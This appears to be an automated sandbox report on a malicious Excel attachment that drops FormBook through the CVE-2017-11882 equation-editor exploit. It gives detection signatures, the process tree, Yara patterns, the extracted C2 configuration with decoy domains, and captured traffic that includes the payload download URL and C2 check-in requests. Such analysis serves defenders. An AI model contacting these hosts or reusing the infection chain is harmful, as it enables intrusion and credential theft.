Analysis Report Letter 1019.xlsx

Overview

General Information

Sample Name: Letter 1019.xlsx
Analysis ID: 432595
MD5: e781a9517fe291b2c42878ac9c68d70c
SHA1: 01e1b2d2df156dfe65bca40f264c71bcee9fa592
SHA256: 2d4f498ee8c41344e6bab8d1d638d48a62672c5cb6ee67afdd5e3333d892715e
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2404 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2676 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2792 cmdline: 'C:\Users\Public\vbc.exe' MD5: 15D907E7D9F8286E5053796C9D78FCEC)
      • vbc.exe (PID: 2440 cmdline: C:\Users\Public\vbc.exe MD5: 15D907E7D9F8286E5053796C9D78FCEC)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • ipconfig.exe (PID: 3036 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: CABB20E171770FF64614A54C1F31C033)
            • cmd.exe (PID: 1688 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x5685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x5171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x5787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x58ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x43ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xb81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      5.2.vbc.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        5.2.vbc.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        4.2.vbc.exe.35eb4f8.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          4.2.vbc.exe.35eb4f8.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x10aa68:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x10adf2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x131c88:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x132012:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x116b05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13dd25:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x1165f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13d811:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x116c07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13de27:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x116d7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x13df9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x10b80a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x132a2a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11586c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x13ca8c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x10c582:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1337a2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x11bbf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x142e17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x11cc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          Exploits:

          Sigma detected: EQNEDT32.EXE connecting to internet
          Source: Network Connection; Author: Joe Security; Data: DestinationIp: 18.140.1.169, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2676, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2676, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe

          System Summary:

          Sigma detected: Droppers Exploiting CVE-2017-11882
          Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2676, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2792
          Sigma detected: Execution from Suspicious Folder
          Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2676, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2792

          Signature Overview

          AV Detection:

          Antivirus detection for URL or domain
          Source: http://18.140.1.169/ggs/doc.exe; Avira URL Cloud: Label: malware
          Source: http://www.myfavbutik.com/p2io/?9rx=dKp6rERGX1oMTEkAtHZ5ksFEU2G9ncFkpMVxqDe1xbP28bbT8N8SqGfKoZnot7fJ59eAsw==&1bPx7=ifrhEpc0Hv8pf4; Avira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp; Malware Configuration Extractor: FormBook (same configuration as shown under Malware Configuration above)
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe; ReversingLabs: Detection: 15%
          Source: C:\Users\Public\vbc.exe; ReversingLabs: Detection: 15%
          Multi AV Scanner detection for submitted file
          Source: Letter 1019.xlsx; ReversingLabs: Detection: 26%
          Yara detected FormBook
          Source: Yara match; File source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.2.vbc.exe.35eb4f8.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped file
          Source: C:\Users\Public\vbc.exe; Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe; Joe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.vbc.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
          Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: ipconfig.pdb source: vbc.exe, 00000005.00000003.2207164700.000000000026C000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\ESxPeVCqHk\src\obj\x86\Debug\OrderablePartitioner.pdb source: vbc.exe
          Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000005.00000003.2207164700.000000000026C000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe
          Source: excel.exe; Memory has grown: Private usage: 4MB later: 70MB
          Source: C:\Users\Public\vbc.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h; 4_2_009BD8C0
          Source: C:\Users\Public\vbc.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h; 4_2_009BDA40
          Source: C:\Users\Public\vbc.exe; Code function: 4x nop then pop edi; 5_2_00416282
          Source: C:\Users\Public\vbc.exe; Code function: 4x nop then pop ebx; 5_2_00406A94
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 4x nop then pop edi; 7_2_00096282
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 4x nop then pop ebx; 7_2_00086A95
          Source: global traffic; DNS query: name: www.myfavbutik.com
          Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 18.140.1.169:80

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic; Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 18.140.1.169:80
          Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 172.67.161.4:80
          Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 172.67.161.4:80
          Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 172.67.161.4:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor; URLs: www.adultpeace.com/p2io/
          Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK | Date: Thu, 10 Jun 2021 13:24:50 GMT | Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7 | Last-Modified: Thu, 10 Jun 2021 09:42:41 GMT | ETag: "f2a00-5c4663658bc88" | Accept-Ranges: bytes | Content-Length: 993792 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
          Source: global traffic; HTTP traffic detected: GET /p2io/?9rx=dKp6rERGX1oMTEkAtHZ5ksFEU2G9ncFkpMVxqDe1xbP28bbT8N8SqGfKoZnot7fJ59eAsw==&1bPx7=ifrhEpc0Hv8pf4 HTTP/1.1 | Host: www.myfavbutik.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic; HTTP traffic detected: GET /p2io/?9rx=V9Q6YNEpmTTku3594j8RVRt0udPCykKEN/raiLh+TizfOzW/z4mr+TojY495qvgWXqOzag==&1bPx7=ifrhEpc0Hv8pf4 HTTP/1.1 | Host: www.69-1hn7uc.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic; HTTP traffic detected: GET /p2io/?9rx=lrOqxb+UJCh0p+XgaZ1tkMjkgx31NOkXgmck/5zOeb61pSaxp+mpU6ffv/qKl6HzQ2hiJA==&1bPx7=ifrhEpc0Hv8pf4 HTTP/1.1 | Host: www.defenestration.world | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: Joe Sandbox View; IP Address: 99.83.154.118
          Source: Joe Sandbox View; ASN Name: SAKURA-BSAKURAInternetIncJP
          Source: Joe Sandbox View; ASN Name: AMAZON-02US
          Source: global traffic; HTTP traffic detected: GET /ggs/doc.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 18.140.1.169 | Connection: Keep-Alive
          Source: unknown; TCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F152D108.emf
          Source: unknown; DNS traffic detected: queries for: www.myfavbutik.com
          Source: explorer.exe, 00000006.00000000.2194134421.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://%s.com
          Source: explorer.exe, 00000006.00000000.2194134421.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmp; String found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2181831950.0000000003E27000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.2181831950.0000000003E27000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2175772627.0000000001C70000.00000002.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.2172296489.0000000002501000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000000.2181831950.0000000003E27000.00000002.00000001.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmp; String found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmp; String found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2181831950.0000000003E27000.00000002.00000001.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.2194134421.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000006.00000000.2175772627.0000000001C70000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmp; String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2181831950.0000000003E27000.00000002.00000001.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmp; String found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2182851298.00000000041AD000.00000004.00000001.sdmp; String found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2182851298.00000000041AD000.00000004.00000001.sdmp; String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2181646383.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.35eb4f8.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.35eb4f8.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
